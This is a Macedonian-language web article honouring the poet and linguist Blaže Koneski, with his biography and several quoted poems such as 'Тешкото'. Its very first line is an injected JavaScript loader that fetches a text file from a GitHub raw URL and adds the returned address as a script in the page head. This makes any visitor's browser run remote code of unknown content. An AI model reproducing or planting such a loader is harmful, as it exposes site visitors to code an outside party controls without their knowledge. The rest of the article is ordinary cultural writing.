;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Чествување на Блаже Конески (19 декември 1921 – 7 декември 1993) - Антропол
АктуелноЛокално

Чествување на Блаже Конески (19 декември 1921 – 7 декември 1993)

Блаже Конески е исклучително значајна личност во културната меморија на македонскиот народ. Годинава славиме 75 години од основање на Катедрата за македонски казик и јужнословенски јазици и тоа во годината посеветена на Блаже Конески по повод големиот јубилеј стогодишнината од раѓањето на великанот. Ова претставува посебен повод во кој е достојно да се потсетиме на неговото творештво и значење.

Блаже Конески е најграндиозната фигура во македонскиот 20 век. Секој обид да се направи макар и куса ретроспектива на неговите дела и заслуги за Македонскиот јазик, литература, култура и нација е просто невозможен.

Конески е вонсериски лингвист, меѓународно реномиран славист, еден од најзначајните протагонисти во процесот на кодификацијата на Македонскиот стандарден јазик, втемелувач на Македонистиката на Филолошкиот факултет во Скопје (кој денес го носи неговото име), ценет професор, основач на Друштвото на писателите на Македонија и член на Македонскиот ПЕН центар, еден од основачите и прв претседател на МАНУ, член на академиите на науките и уметностите во Загреб, Белград, Сараево, Чикаго, Лоѓ. Тој е и поет и писател, книжевник, професор, академик и прв претседател на МАНУ, автор на 13 поетски книги, лауреат на значаен број Македонски и меѓународни награди и признанија (Хердерова награда, Његошова награда, Златен венец на Струшките вечери на поезијата итн.).

Тој е и истакнат прозаист, есеист, публицист, литературен историчар, полиглот, препејувач од многу јазици на делата на низа поети (Његош, Прешерн, Хајне, Блок, Мицкјевич, Неруда, Волкер, Мајаковски). Неговите дела се преведени на голем број јазици.

Конески е основач на студиите по македонистика, а во периодот од 1958 до 1963 бил ректор на универзитетот. Како научник-славист, тој ги направил најголемите чекори за македонскиот литературен јазик. Учествувал во комисијата за азбука, ја изработил граматиката на современиот македонски јазки, го составил правописот на македонскиот литературен јазик, ја напишал Историјата на македонскиот јазик, тој е еден од составувачите и главен редактор на Речникот на македонскиот јазик (во три тома). Токму поради тоа се смета за еден од кодификаторите на македонскиот јазик, кој денес силно е нападнат од сите страни.

Но тој ги антиципира процесите и како голем пророк не случајно не предупредува: „Големо ни е името, ќе сакаат да ни го земат“. Додека во својот „Дневник по многу години“ ни го остава анаметот за татковината: ,,Сетете се како е да останеш без татковина. Тоа е исто како да останеш без кров над глава“.

Своето визионерство го покажа многупати. Некоја година пред целосното ослободување на нашата држава ја предвиде ситуацијата, па уште во април 1989 ја напиша песната Лажни пророци (По евангелието):

Ќе дојде време на лажни пророци
што божем во мое име
ќе ве збираат по плоштадите,
ќе креваат врева до небеси,
ќе се бувтаат во градите.
Немојте да им верувате!
Тие мислат само на себеси.
Бес ги распина внатре
душите да ви ги затре.
Тие варосани гробови!
Не да им станете робови!
Кој ќе се препознае меѓу
можниве пророци?

Изборот на неговата животна задача произлегува токму од свеста за трагичноста на македонската историја. Тоа најекспицитно се забележува во неговата поезија. Тие песни се блиски до народот и се неговиот заштитен знак. Типична, во оваа смисла е антологиската песна „Тешкото“. Во поемата составена од десет строфи од по осум стиха, поетот преку традиционалното оро Тешкото, ја искажал својата љубов кон татковината.

Тешкото
(„Земјата и љубовта“)


О тешкото! Зурли штом диво ќе писнат,
штом тапан ќе грмне со подземен екот —
во градиве зошто жал лута ме стиска,
во очиве зошто ми навира река
и зошто ми иде да плачам ко дете,
да превијам раце, да прекријам лик —
та гризам јас усни, стегам срце клето,
да не пушти вик.

О тешкото! Старци излегуваат еве,
на чело им мисла, во очи им влага
и првиот чекор по меката трева
е мирен и бавен, со здржана тага.
но, ’рзнува тапан и писок се крева
и молнија светнува во секој глед,
и напред се пушта, се стрелка, се слева
стегнатиот ред.

До старците момци се фаќаат скокум;
не издржа срце — сив сокол во клетка,
не издржа пламен жив потулен в око,
не издржа младост што сака да летне!
Се залула оро! Се заврте земја,
и чиниш — се корне стресениот век,
и околу трпнат ридиштата темни
и враќаат ек.

И божем се врасло кипнатово оро
со исконска сила за земјава наша
и во него шуми на реките зборот,
и во него рика див ветар и страшен
и во него шепнат узреани житја
и вечерен мирис се разлева тих,
и земјата дише во пролетна ситост
со запален здив.

И душата, чиниш, на родот мој мачен
во тешково оро се уткала сета —
век по век што трупал се попуст и мрачен
од крвава болка, од робија клета,
век по век што нижел од корава мисла
за радосна челад, за слободен свет,
од песна — за љубов што гине со пискот
ко жерав во лет.

О, тешкото! Кога во молк те гледам,
на очиве магла ми напаѓа сура,
и одеднаш — в бескрај се растега редот
и ридја се губат в пустелија штура —
и еве кај иде од маглата матна
сè сенка до сенка, сè еден до друг —
во бескрајно оро син оди по татка,
по деда си — внук.

Времињата мрачни се нивното поле,
и нивната свирка — на прангите ѕвекот,
а главите им се наведени доле,
и покроце врват — сè чекор по чекор.
О, времиња, што ве в мрак родот мој минал,
кој збор ќе ми најде за вашата стрв?!
Кој збор ќе ми најде за ужасот зинат
над пустош и крв?!

Кој број ќе ми каже на лутите рани,
на пламнати ноќи, на пеплишта пусти,
кој на срце болки ќе изреди збрани,
и на очи солзи, и клетви на усти.
О тешкото! Синџир ти беше на робја,
од калеши моми и невести ред,
со врзани раце со плен што ги погнал
насилникот клет.

О, тешкото! Синџир ти беше на робја,
дур не стана народ во листена гора,
сè дури со јадот од векови собран
не поведе бујно, бунтовничко оро!
Се залула танец низ крвје и огон,
и повик се зачу и грмеж во чад —
те разнесе сегде бунтовната нога
по родниот кат.

О тешкото! Сега по нашите села
во слобода првпат штом оро ќе сретам,
зар чудно е — солза да потече врела,
зар чудно е — жалба јас в срце да сетам?!
Од вековно роропство, мој народе, идеш
но носиш ти в срце дар златен и пој.
Пченицата твоја триж плодна ќе биде,
и животот твој!

Секој од нас кој ќе оствари конекција со неговата поезија, со неговиот лик и дело, има обврска таа љубов да ја пренесе на идините генерации. И самиот Конески тоа го посакал во песната „Обврска“, /Сфати ја со сериозност/ оваа обврска,/ уште посилна дека заемна:/ и без да го знаеш досега тоа/ ние сме се задолжиле да го чуваме/ споменот еден за друг./ Ќе минат сите површни оддалечувања,/ ќе дојде час на враќање/ кон загубеното,/ за да се згрее душата барем малце/ на него/ како што изѕемнатиот ги грее/ рацете/ на жив жар, под распретананта пепел./
Да останеме достојни на аманетот што ни го остави Блаже: /Ваша должност нека остане/ да не се наруши споменот каков сум бил./ Ништо друго./ (Чувари, 148) и да се стремиме кон идеалот на проста и строга македонска песна како кон највисокиот врв. /Еве на врвот се искачив. Сам/ Тука не ме следи око ничие/ И што? Јас во себе пак го шепотам/ жалосниот сон на своето величие./ (Врв, 36)
Неговата родна куќа во Небрегово е спомен–дом, кој заедно со Филолошкиот факултет кој го носи неговото име, се две средишта кои ќе зрачат и ќе ја шират со тоа вистината за Македонскиот јазик и за Македонскиот народ.
Годинава со повеќе настани беше одбележана 100-годишнината од неговото раѓање. Денот кога е роден Конески, 19 декември, е ставен и на листата на значајни јубилеи на УНЕСКО што се одбележуваат во 2021 година. Денес, 28 години од неговото физичко заминување, се сеќаваме на него и на неговото дело преку неговата поезија.

ПРЕТХОДНИЦА

Не барам збор за ова што ни се случува
Речи го: предавство, лудост, гадост, нискост.
Секој ќе плати за својот бес.
Пустошот што те чека
јас веќе го доживеав.
Не бој се. Не е страшно.
На крајот сеќаваш дури жал и блискост.

ПРЕЖИВУВАЊЕ

Какви порази сме морале да издржиме,
какви срамови,
какви поруги.
Боже, умот дури ми се свртува!
Ни помагало нешто, нѐ крепело нешто,
некаква смешка, некаква површност, –
и по сето тоа
во нас
некаква надеж, некаква желба,
некаква скриена смисла
безрасудно
пак изртува!

ТАТКОВИНА

Со замислени меѓи
сум ја означил својата татковина.
Сум поставил белеги на сите нејзини граници
и на сите стратегиски точки:
на тераси над реки, езера и над морскиот брег
кај што сум седел долго со пријатели
во летните вечери,
при чашка црвено вино.
На пазаришта со раскошни бои и опојни мириси
од есенското обилие.
На планински врвови
кога низ проретчени облаци
се открива поглед во далечни предели.
До кај што сум ја пренесол својата љубов,
дотаму е мојата татковина.
А вие, еј!
На што сте смислиле да ја сведете?!